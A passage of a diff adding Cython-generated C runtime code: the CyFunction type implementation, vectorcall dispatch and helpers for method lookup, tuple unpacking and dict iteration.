(getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, + {(char *) "__defaults__", (getter)__Pyx_CyFunction_get_defaults, (setter)__Pyx_CyFunction_set_defaults, 0, 0}, + {(char *) "__kwdefaults__", (getter)__Pyx_CyFunction_get_kwdefaults, (setter)__Pyx_CyFunction_set_kwdefaults, 0, 0}, + {(char *) "__annotations__", (getter)__Pyx_CyFunction_get_annotations, (setter)__Pyx_CyFunction_set_annotations, 0, 0}, + {(char *) "_is_coroutine", (getter)__Pyx_CyFunction_get_is_coroutine, 0, 0, 0}, + {0, 0, 0, 0, 0} +}; +static PyMemberDef __pyx_CyFunction_members[] = { + {(char *) "__module__", T_OBJECT, offsetof(PyCFunctionObject, m_module), 0, 0}, +#if CYTHON_USE_TYPE_SPECS + {(char *) "__dictoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_dict), READONLY, 0}, +#if CYTHON_METH_FASTCALL +#if CYTHON_BACKPORT_VECTORCALL + {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_vectorcall), READONLY, 0}, +#else + {(char *) "__vectorcalloffset__", T_PYSSIZET, offsetof(PyCFunctionObject, vectorcall), READONLY, 0}, +#endif +#endif +#if PY_VERSION_HEX < 0x030500A0 + {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(__pyx_CyFunctionObject, func_weakreflist), READONLY, 0}, +#else + {(char *) "__weaklistoffset__", T_PYSSIZET, offsetof(PyCFunctionObject, m_weakreflist), READONLY, 0}, +#endif +#endif + {0, 0, 0, 0, 0} +}; +static PyObject * +__Pyx_CyFunction_reduce(__pyx_CyFunctionObject *m, PyObject *args) +{ + CYTHON_UNUSED_VAR(args); +#if PY_MAJOR_VERSION >= 3 + Py_INCREF(m->func_qualname); + return m->func_qualname; +#else + return PyString_FromString(((PyCFunctionObject*)m)->m_ml->ml_name); +#endif +} +static PyMethodDef __pyx_CyFunction_methods[] = { + {"__reduce__", (PyCFunction)__Pyx_CyFunction_reduce, METH_VARARGS, 0}, + {0, 0, 0, 0} +}; +#if PY_VERSION_HEX < 0x030500A0 +#define __Pyx_CyFunction_weakreflist(cyfunc) ((cyfunc)->func_weakreflist) +#else +#define __Pyx_CyFunction_weakreflist(cyfunc) (((PyCFunctionObject*)cyfunc)->m_weakreflist) +#endif +static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject *op, PyMethodDef *ml, int flags, PyObject* qualname, + PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { + PyCFunctionObject *cf = (PyCFunctionObject*) op; + if (unlikely(op == NULL)) + return NULL; + op->flags = flags; + __Pyx_CyFunction_weakreflist(op) = NULL; + cf->m_ml = ml; + cf->m_self = (PyObject *) op; + Py_XINCREF(closure); + op->func_closure = closure; + Py_XINCREF(module); + cf->m_module = module; + op->func_dict = NULL; + op->func_name = NULL; + Py_INCREF(qualname); + op->func_qualname = qualname; + op->func_doc = NULL; +#if PY_VERSION_HEX < 0x030900B1 + op->func_classobj = NULL; +#else + ((PyCMethodObject*)op)->mm_class = NULL; +#endif + op->func_globals = globals; + Py_INCREF(op->func_globals); + Py_XINCREF(code); + op->func_code = code; + op->defaults_pyobjects = 0; + op->defaults_size = 0; + op->defaults = NULL; + op->defaults_tuple = NULL; + op->defaults_kwdict = NULL; + op->defaults_getter = NULL; + op->func_annotations = NULL; + op->func_is_coroutine = NULL; +#if CYTHON_METH_FASTCALL + switch (ml->ml_flags & (METH_VARARGS | METH_FASTCALL | METH_NOARGS | METH_O | METH_KEYWORDS | METH_METHOD)) { + case METH_NOARGS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_NOARGS; + break; + case METH_O: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_O; + break; + case METH_METHOD | METH_FASTCALL | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD; + break; + case METH_FASTCALL | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS; + break; + case METH_VARARGS | METH_KEYWORDS: + __Pyx_CyFunction_func_vectorcall(op) = NULL; + break; + default: + PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); + Py_DECREF(op); + return NULL; + } +#endif + return (PyObject *) op; +} +static int +__Pyx_CyFunction_clear(__pyx_CyFunctionObject *m) +{ + Py_CLEAR(m->func_closure); + Py_CLEAR(((PyCFunctionObject*)m)->m_module); + Py_CLEAR(m->func_dict); + Py_CLEAR(m->func_name); + Py_CLEAR(m->func_qualname); + Py_CLEAR(m->func_doc); + Py_CLEAR(m->func_globals); + Py_CLEAR(m->func_code); +#if PY_VERSION_HEX < 0x030900B1 + Py_CLEAR(__Pyx_CyFunction_GetClassObj(m)); +#else + { + PyObject *cls = (PyObject*) ((PyCMethodObject *) (m))->mm_class; + ((PyCMethodObject *) (m))->mm_class = NULL; + Py_XDECREF(cls); + } +#endif + Py_CLEAR(m->defaults_tuple); + Py_CLEAR(m->defaults_kwdict); + Py_CLEAR(m->func_annotations); + Py_CLEAR(m->func_is_coroutine); + if (m->defaults) { + PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); + int i; + for (i = 0; i < m->defaults_pyobjects; i++) + Py_XDECREF(pydefaults[i]); + PyObject_Free(m->defaults); + m->defaults = NULL; + } + return 0; +} +static void __Pyx__CyFunction_dealloc(__pyx_CyFunctionObject *m) +{ + if (__Pyx_CyFunction_weakreflist(m) != NULL) + PyObject_ClearWeakRefs((PyObject *) m); + __Pyx_CyFunction_clear(m); + __Pyx_PyHeapTypeObject_GC_Del(m); +} +static void __Pyx_CyFunction_dealloc(__pyx_CyFunctionObject *m) +{ + PyObject_GC_UnTrack(m); + __Pyx__CyFunction_dealloc(m); +} +static int __Pyx_CyFunction_traverse(__pyx_CyFunctionObject *m, visitproc visit, void *arg) +{ + Py_VISIT(m->func_closure); + Py_VISIT(((PyCFunctionObject*)m)->m_module); + Py_VISIT(m->func_dict); + Py_VISIT(m->func_name); + Py_VISIT(m->func_qualname); + Py_VISIT(m->func_doc); + Py_VISIT(m->func_globals); + Py_VISIT(m->func_code); + Py_VISIT(__Pyx_CyFunction_GetClassObj(m)); + Py_VISIT(m->defaults_tuple); + Py_VISIT(m->defaults_kwdict); + Py_VISIT(m->func_is_coroutine); + if (m->defaults) { + PyObject **pydefaults = __Pyx_CyFunction_Defaults(PyObject *, m); + int i; + for (i = 0; i < m->defaults_pyobjects; i++) + Py_VISIT(pydefaults[i]); + } + return 0; +} +static PyObject* +__Pyx_CyFunction_repr(__pyx_CyFunctionObject *op) +{ +#if PY_MAJOR_VERSION >= 3 + return PyUnicode_FromFormat("", + op->func_qualname, (void *)op); +#else + return PyString_FromFormat("", + PyString_AsString(op->func_qualname), (void *)op); +#endif +} +static PyObject * __Pyx_CyFunction_CallMethod(PyObject *func, PyObject *self, PyObject *arg, PyObject *kw) { + PyCFunctionObject* f = (PyCFunctionObject*)func; + PyCFunction meth = f->m_ml->ml_meth; + Py_ssize_t size; + switch (f->m_ml->ml_flags & (METH_VARARGS | METH_KEYWORDS | METH_NOARGS | METH_O)) { + case METH_VARARGS: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) + return (*meth)(self, arg); + break; + case METH_VARARGS | METH_KEYWORDS: + return (*(PyCFunctionWithKeywords)(void*)meth)(self, arg, kw); + case METH_NOARGS: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) { + size = PyTuple_GET_SIZE(arg); + if (likely(size == 0)) + return (*meth)(self, NULL); + PyErr_Format(PyExc_TypeError, + "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", + f->m_ml->ml_name, size); + return NULL; + } + break; + case METH_O: + if (likely(kw == NULL || PyDict_Size(kw) == 0)) { + size = PyTuple_GET_SIZE(arg); + if (likely(size == 1)) { + PyObject *result, *arg0; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + arg0 = PyTuple_GET_ITEM(arg, 0); + #else + arg0 = PySequence_ITEM(arg, 0); if (unlikely(!arg0)) return NULL; + #endif + result = (*meth)(self, arg0); + #if !(CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS) + Py_DECREF(arg0); + #endif + return result; + } + PyErr_Format(PyExc_TypeError, + "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", + f->m_ml->ml_name, size); + return NULL; + } + break; + default: + PyErr_SetString(PyExc_SystemError, "Bad call flags for CyFunction"); + return NULL; + } + PyErr_Format(PyExc_TypeError, "%.200s() takes no keyword arguments", + f->m_ml->ml_name); + return NULL; +} +static CYTHON_INLINE PyObject *__Pyx_CyFunction_Call(PyObject *func, PyObject *arg, PyObject *kw) { + return __Pyx_CyFunction_CallMethod(func, ((PyCFunctionObject*)func)->m_self, arg, kw); +} +static PyObject *__Pyx_CyFunction_CallAsMethod(PyObject *func, PyObject *args, PyObject *kw) { + PyObject *result; + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *) func; +#if CYTHON_METH_FASTCALL + __pyx_vectorcallfunc vc = __Pyx_CyFunction_func_vectorcall(cyfunc); + if (vc) { +#if CYTHON_ASSUME_SAFE_MACROS + return __Pyx_PyVectorcall_FastCallDict(func, vc, &PyTuple_GET_ITEM(args, 0), (size_t)PyTuple_GET_SIZE(args), kw); +#else + (void) &__Pyx_PyVectorcall_FastCallDict; + return PyVectorcall_Call(func, args, kw); +#endif + } +#endif + if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { + Py_ssize_t argc; + PyObject *new_args; + PyObject *self; + argc = PyTuple_GET_SIZE(args); + new_args = PyTuple_GetSlice(args, 1, argc); + if (unlikely(!new_args)) + return NULL; + self = PyTuple_GetItem(args, 0); + if (unlikely(!self)) { + Py_DECREF(new_args); +#if PY_MAJOR_VERSION > 2 + PyErr_Format(PyExc_TypeError, + "unbound method %.200S() needs an argument", + cyfunc->func_qualname); +#else + PyErr_SetString(PyExc_TypeError, + "unbound method needs an argument"); +#endif + return NULL; + } + result = __Pyx_CyFunction_CallMethod(func, self, new_args, kw); + Py_DECREF(new_args); + } else { + result = __Pyx_CyFunction_Call(func, args, kw); + } + return result; +} +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE int __Pyx_CyFunction_Vectorcall_CheckArgs(__pyx_CyFunctionObject *cyfunc, Py_ssize_t nargs, PyObject *kwnames) +{ + int ret = 0; + if ((cyfunc->flags & __Pyx_CYFUNCTION_CCLASS) && !(cyfunc->flags & __Pyx_CYFUNCTION_STATICMETHOD)) { + if (unlikely(nargs < 1)) { + PyErr_Format(PyExc_TypeError, "%.200s() needs an argument", + ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); + return -1; + } + ret = 1; + } + if (unlikely(kwnames) && unlikely(PyTuple_GET_SIZE(kwnames))) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes no keyword arguments", ((PyCFunctionObject*)cyfunc)->m_ml->ml_name); + return -1; + } + return ret; +} +static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + if (unlikely(nargs != 0)) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes no arguments (%" CYTHON_FORMAT_SSIZE_T "d given)", + def->ml_name, nargs); + return NULL; + } + return def->ml_meth(self, NULL); +} +static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, kwnames)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + if (unlikely(nargs != 1)) { + PyErr_Format(PyExc_TypeError, + "%.200s() takes exactly one argument (%" CYTHON_FORMAT_SSIZE_T "d given)", + def->ml_name, nargs); + return NULL; + } + return def->ml_meth(self, args[0]); +} +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + return ((_PyCFunctionFastWithKeywords)(void(*)(void))def->ml_meth)(self, args, nargs, kwnames); +} +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames) +{ + __pyx_CyFunctionObject *cyfunc = (__pyx_CyFunctionObject *)func; + PyMethodDef* def = ((PyCFunctionObject*)cyfunc)->m_ml; + PyTypeObject *cls = (PyTypeObject *) __Pyx_CyFunction_GetClassObj(cyfunc); +#if CYTHON_BACKPORT_VECTORCALL + Py_ssize_t nargs = (Py_ssize_t)nargsf; +#else + Py_ssize_t nargs = PyVectorcall_NARGS(nargsf); +#endif + PyObject *self; + switch (__Pyx_CyFunction_Vectorcall_CheckArgs(cyfunc, nargs, NULL)) { + case 1: + self = args[0]; + args += 1; + nargs -= 1; + break; + case 0: + self = ((PyCFunctionObject*)cyfunc)->m_self; + break; + default: + return NULL; + } + return ((__Pyx_PyCMethod)(void(*)(void))def->ml_meth)(self, cls, args, (size_t)nargs, kwnames); +} +#endif +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_CyFunctionType_slots[] = { + {Py_tp_dealloc, (void *)__Pyx_CyFunction_dealloc}, + {Py_tp_repr, (void *)__Pyx_CyFunction_repr}, + {Py_tp_call, (void *)__Pyx_CyFunction_CallAsMethod}, + {Py_tp_traverse, (void *)__Pyx_CyFunction_traverse}, + {Py_tp_clear, (void *)__Pyx_CyFunction_clear}, + {Py_tp_methods, (void *)__pyx_CyFunction_methods}, + {Py_tp_members, (void *)__pyx_CyFunction_members}, + {Py_tp_getset, (void *)__pyx_CyFunction_getsets}, + {Py_tp_descr_get, (void *)__Pyx_PyMethod_New}, + {0, 0}, +}; +static PyType_Spec __pyx_CyFunctionType_spec = { + __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", + sizeof(__pyx_CyFunctionObject), + 0, +#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR + Py_TPFLAGS_METHOD_DESCRIPTOR | +#endif +#if (defined(_Py_TPFLAGS_HAVE_VECTORCALL) && CYTHON_METH_FASTCALL) + _Py_TPFLAGS_HAVE_VECTORCALL | +#endif + Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, + __pyx_CyFunctionType_slots +}; +#else +static PyTypeObject __pyx_CyFunctionType_type = { + PyVarObject_HEAD_INIT(0, 0) + __PYX_TYPE_MODULE_PREFIX "cython_function_or_method", + sizeof(__pyx_CyFunctionObject), + 0, + (destructor) __Pyx_CyFunction_dealloc, +#if !CYTHON_METH_FASTCALL + 0, +#elif CYTHON_BACKPORT_VECTORCALL + (printfunc)offsetof(__pyx_CyFunctionObject, func_vectorcall), +#else + offsetof(PyCFunctionObject, vectorcall), +#endif + 0, + 0, +#if PY_MAJOR_VERSION < 3 + 0, +#else + 0, +#endif + (reprfunc) __Pyx_CyFunction_repr, + 0, + 0, + 0, + 0, + __Pyx_CyFunction_CallAsMethod, + 0, + 0, + 0, + 0, +#ifdef Py_TPFLAGS_METHOD_DESCRIPTOR + Py_TPFLAGS_METHOD_DESCRIPTOR | +#endif +#ifdef _Py_TPFLAGS_HAVE_VECTORCALL + _Py_TPFLAGS_HAVE_VECTORCALL | +#endif + Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC | Py_TPFLAGS_BASETYPE, + 0, + (traverseproc) __Pyx_CyFunction_traverse, + (inquiry) __Pyx_CyFunction_clear, + 0, +#if PY_VERSION_HEX < 0x030500A0 + offsetof(__pyx_CyFunctionObject, func_weakreflist), +#else + offsetof(PyCFunctionObject, m_weakreflist), +#endif + 0, + 0, + __pyx_CyFunction_methods, + __pyx_CyFunction_members, + __pyx_CyFunction_getsets, + 0, + 0, + __Pyx_PyMethod_New, + 0, + offsetof(__pyx_CyFunctionObject, func_dict), + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, + 0, +#if PY_VERSION_HEX >= 0x030400a1 + 0, +#endif +#if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, +#endif +#if __PYX_NEED_TP_PRINT_SLOT + 0, +#endif +#if PY_VERSION_HEX >= 0x030C0000 + 0, +#endif +#if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, +#endif +}; +#endif +static int __pyx_CyFunction_init(PyObject *module) { +#if CYTHON_USE_TYPE_SPECS + __pyx_CyFunctionType = __Pyx_FetchCommonTypeFromSpec(module, &__pyx_CyFunctionType_spec, NULL); +#else + CYTHON_UNUSED_VAR(module); + __pyx_CyFunctionType = __Pyx_FetchCommonType(&__pyx_CyFunctionType_type); +#endif + if (unlikely(__pyx_CyFunctionType == NULL)) { + return -1; + } + return 0; +} +static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *func, size_t size, int pyobjects) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults = PyObject_Malloc(size); + if (unlikely(!m->defaults)) + return PyErr_NoMemory(); + memset(m->defaults, 0, size); + m->defaults_pyobjects = pyobjects; + m->defaults_size = size; + return m->defaults; +} +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *func, PyObject *tuple) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults_tuple = tuple; + Py_INCREF(tuple); +} +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *func, PyObject *dict) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->defaults_kwdict = dict; + Py_INCREF(dict); +} +static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *func, PyObject *dict) { + __pyx_CyFunctionObject *m = (__pyx_CyFunctionObject *) func; + m->func_annotations = dict; + Py_INCREF(dict); +} + +/* CythonFunction */ + static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, int flags, PyObject* qualname, + PyObject *closure, PyObject *module, PyObject* globals, PyObject* code) { + PyObject *op = __Pyx_CyFunction_Init( + PyObject_GC_New(__pyx_CyFunctionObject, __pyx_CyFunctionType), + ml, flags, qualname, closure, module, globals, code + ); + if (likely(op)) { + PyObject_GC_Track(op); + } + return op; +} + +/* IterFinish */ + static CYTHON_INLINE int __Pyx_IterFinish(void) { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + PyObject* exc_type = __Pyx_PyErr_CurrentExceptionType(); + if (unlikely(exc_type)) { + if (unlikely(!__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) + return -1; + __Pyx_PyErr_Clear(); + return 0; + } + return 0; +} + +/* PyObjectCallNoArg */ + static CYTHON_INLINE PyObject* __Pyx_PyObject_CallNoArg(PyObject *func) { + PyObject *arg = NULL; + return __Pyx_PyObject_FastCall(func, (&arg)+1, 0 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); +} + +/* PyObjectGetMethod */ + static int __Pyx_PyObject_GetMethod(PyObject *obj, PyObject *name, PyObject **method) { + PyObject *attr; +#if CYTHON_UNPACK_METHODS && CYTHON_COMPILING_IN_CPYTHON && CYTHON_USE_PYTYPE_LOOKUP + __Pyx_TypeName type_name; + PyTypeObject *tp = Py_TYPE(obj); + PyObject *descr; + descrgetfunc f = NULL; + PyObject **dictptr, *dict; + int meth_found = 0; + assert (*method == NULL); + if (unlikely(tp->tp_getattro != PyObject_GenericGetAttr)) { + attr = __Pyx_PyObject_GetAttrStr(obj, name); + goto try_unpack; + } + if (unlikely(tp->tp_dict == NULL) && unlikely(PyType_Ready(tp) < 0)) { + return 0; + } + descr = _PyType_Lookup(tp, name); + if (likely(descr != NULL)) { + Py_INCREF(descr); +#if defined(Py_TPFLAGS_METHOD_DESCRIPTOR) && Py_TPFLAGS_METHOD_DESCRIPTOR + if (__Pyx_PyType_HasFeature(Py_TYPE(descr), Py_TPFLAGS_METHOD_DESCRIPTOR)) +#elif PY_MAJOR_VERSION >= 3 + #ifdef __Pyx_CyFunction_USED + if (likely(PyFunction_Check(descr) || __Pyx_IS_TYPE(descr, &PyMethodDescr_Type) || __Pyx_CyFunction_Check(descr))) + #else + if (likely(PyFunction_Check(descr) || __Pyx_IS_TYPE(descr, &PyMethodDescr_Type))) + #endif +#else + #ifdef __Pyx_CyFunction_USED + if (likely(PyFunction_Check(descr) || __Pyx_CyFunction_Check(descr))) + #else + if (likely(PyFunction_Check(descr))) + #endif +#endif + { + meth_found = 1; + } else { + f = Py_TYPE(descr)->tp_descr_get; + if (f != NULL && PyDescr_IsData(descr)) { + attr = f(descr, obj, (PyObject *)Py_TYPE(obj)); + Py_DECREF(descr); + goto try_unpack; + } + } + } + dictptr = _PyObject_GetDictPtr(obj); + if (dictptr != NULL && (dict = *dictptr) != NULL) { + Py_INCREF(dict); + attr = __Pyx_PyDict_GetItemStr(dict, name); + if (attr != NULL) { + Py_INCREF(attr); + Py_DECREF(dict); + Py_XDECREF(descr); + goto try_unpack; + } + Py_DECREF(dict); + } + if (meth_found) { + *method = descr; + return 1; + } + if (f != NULL) { + attr = f(descr, obj, (PyObject *)Py_TYPE(obj)); + Py_DECREF(descr); + goto try_unpack; + } + if (likely(descr != NULL)) { + *method = descr; + return 0; + } + type_name = __Pyx_PyType_GetName(tp); + PyErr_Format(PyExc_AttributeError, +#if PY_MAJOR_VERSION >= 3 + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%U'", + type_name, name); +#else + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%.400s'", + type_name, PyString_AS_STRING(name)); +#endif + __Pyx_DECREF_TypeName(type_name); + return 0; +#else + attr = __Pyx_PyObject_GetAttrStr(obj, name); + goto try_unpack; +#endif +try_unpack: +#if CYTHON_UNPACK_METHODS + if (likely(attr) && PyMethod_Check(attr) && likely(PyMethod_GET_SELF(attr) == obj)) { + PyObject *function = PyMethod_GET_FUNCTION(attr); + Py_INCREF(function); + Py_DECREF(attr); + *method = function; + return 1; + } +#endif + *method = attr; + return 0; +} + +/* PyObjectCallMethod0 */ + static PyObject* __Pyx_PyObject_CallMethod0(PyObject* obj, PyObject* method_name) { + PyObject *method = NULL, *result = NULL; + int is_method = __Pyx_PyObject_GetMethod(obj, method_name, &method); + if (likely(is_method)) { + result = __Pyx_PyObject_CallOneArg(method, obj); + Py_DECREF(method); + return result; + } + if (unlikely(!method)) goto bad; + result = __Pyx_PyObject_CallNoArg(method); + Py_DECREF(method); +bad: + return result; +} + +/* UnpackItemEndCheck */ + static int __Pyx_IternextUnpackEndCheck(PyObject *retval, Py_ssize_t expected) { + if (unlikely(retval)) { + Py_DECREF(retval); + __Pyx_RaiseTooManyValuesError(expected); + return -1; + } + return __Pyx_IterFinish(); +} + +/* UnpackTupleError */ + static void __Pyx_UnpackTupleError(PyObject *t, Py_ssize_t index) { + if (t == Py_None) { + __Pyx_RaiseNoneNotIterableError(); + } else if (PyTuple_GET_SIZE(t) < index) { + __Pyx_RaiseNeedMoreValuesError(PyTuple_GET_SIZE(t)); + } else { + __Pyx_RaiseTooManyValuesError(index); + } +} + +/* UnpackTuple2 */ + static CYTHON_INLINE int __Pyx_unpack_tuple2_exact( + PyObject* tuple, PyObject** pvalue1, PyObject** pvalue2, int decref_tuple) { + PyObject *value1 = NULL, *value2 = NULL; +#if CYTHON_COMPILING_IN_PYPY + value1 = PySequence_ITEM(tuple, 0); if (unlikely(!value1)) goto bad; + value2 = PySequence_ITEM(tuple, 1); if (unlikely(!value2)) goto bad; +#else + value1 = PyTuple_GET_ITEM(tuple, 0); Py_INCREF(value1); + value2 = PyTuple_GET_ITEM(tuple, 1); Py_INCREF(value2); +#endif + if (decref_tuple) { + Py_DECREF(tuple); + } + *pvalue1 = value1; + *pvalue2 = value2; + return 0; +#if CYTHON_COMPILING_IN_PYPY +bad: + Py_XDECREF(value1); + Py_XDECREF(value2); + if (decref_tuple) { Py_XDECREF(tuple); } + return -1; +#endif +} +static int __Pyx_unpack_tuple2_generic(PyObject* tuple, PyObject** pvalue1, PyObject** pvalue2, + int has_known_size, int decref_tuple) { + Py_ssize_t index; + PyObject *value1 = NULL, *value2 = NULL, *iter = NULL; + iternextfunc iternext; + iter = PyObject_GetIter(tuple); + if (unlikely(!iter)) goto bad; + if (decref_tuple) { Py_DECREF(tuple); tuple = NULL; } + iternext = __Pyx_PyObject_GetIterNextFunc(iter); + value1 = iternext(iter); if (unlikely(!value1)) { index = 0; goto unpacking_failed; } + value2 = iternext(iter); if (unlikely(!value2)) { index = 1; goto unpacking_failed; } + if (!has_known_size && unlikely(__Pyx_IternextUnpackEndCheck(iternext(iter), 2))) goto bad; + Py_DECREF(iter); + *pvalue1 = value1; + *pvalue2 = value2; + return 0; +unpacking_failed: + if (!has_known_size && __Pyx_IterFinish() == 0) + __Pyx_RaiseNeedMoreValuesError(index); +bad: + Py_XDECREF(iter); + Py_XDECREF(value1); + Py_XDECREF(value2); + if (decref_tuple) { Py_XDECREF(tuple); } + return -1; +} + +/* dict_iter */ + static CYTHON_INLINE PyObject* __Pyx_dict_iterator(PyObject* iterable, int is_dict, PyObject* method_name, + Py_ssize_t* p_orig_length, int* p_source_is_dict) { + is_dict = is_dict || likely(PyDict_CheckExact(iterable)); + *p_source_is_dict = is_dict; + if (is_dict) { +#if !CYTHON_COMPILING_IN_PYPY + *p_orig_length = PyDict_Size(iterable); + Py_INCREF(iterable); + return iterable; +#elif PY_MAJOR_VERSION >= 3 + static PyObject *py_items = NULL, *py_keys = NULL, *py_values = NULL; + PyObject **pp = NULL; + if (method_name) { + const char *name = PyUnicode_AsUTF8(method_name); + if (strcmp(name, "iteritems") == 0) pp = &py_items; + else if (strcmp(name, "iterkeys") == 0) pp = &py_keys; + else if (strcmp(name, "itervalues") == 0) pp = &py_values; + if (pp) { + if (!*pp) { + *pp = PyUnicode_FromString(name + 4); + if (!*pp) + return NULL; + } + method_name = *pp; + } + } +#endif + } + *p_orig_length = 0; + if (method_name) { + PyObject* iter; + iterable = __Pyx_PyObject_CallMethod0(iterable, method_name); + if (!iterable) + return NULL; +#if !CYTHON_COMPILING_IN_PYPY + if (PyTuple_CheckExact(iterable) || PyList_CheckExact(iterable)) + return iterable; +#endif + iter = PyObject_GetIter(iterable); + Py_DECREF(iterable); + return iter; + } + return PyObject_GetIter(iterable); +} +static CYTHON_INLINE int __Pyx_dict_iter_next( + PyObject* iter_obj, CYTHON_NCP_UNUSED Py_ssize_t orig_length, CYTHON_NCP_UNUSED Py_ssize_t* ppos, + PyObject** pkey, PyObject** pvalue, PyObject** pitem, int source_is_dict) { + PyObject* next_item; +#if !CYTHON_COMPILING_IN_PYPY + if (source_is_dict) { + PyObject *key, *value; + if (unlikely(orig_length != PyDict_Size(iter_obj))) { + PyErr_SetString(PyExc_RuntimeError, "dictionary changed size during iteration"); + return -1; + } + if (unlikely(!PyDict_Next(iter_obj, ppos, &key, &value))) { + return 0; + } + if (pitem) { + PyObject* tuple = PyTuple_New(2); + if (unlikely(!tuple)) { + return -1; + } + Py_INCREF(key); + Py_INCREF(value); + PyTuple_SET_ITEM(tuple, 0, key); + PyTuple_SET_ITEM(tuple, 1, value); + *pitem = tuple; + } else { + if (pkey) { + Py_INCREF(key); + *pkey = key; + } + if (pvalue) { + Py_INCREF(value); + *pvalue = value; + } + } + return 1; + } else if (PyTuple_CheckExact(iter_obj)) { + Py_ssize_t pos = *ppos; + if (unlikely(pos >= PyTuple_GET_SIZE(iter_obj))) return 0; + *ppos = pos + 1; + next_item = PyTuple_GET_ITEM(iter_obj, pos); + Py_INCREF(next_item); + } else if (PyList_CheckExact(iter_obj)) { + Py_ssize_t pos = *ppos; + if (unlikely(pos >= 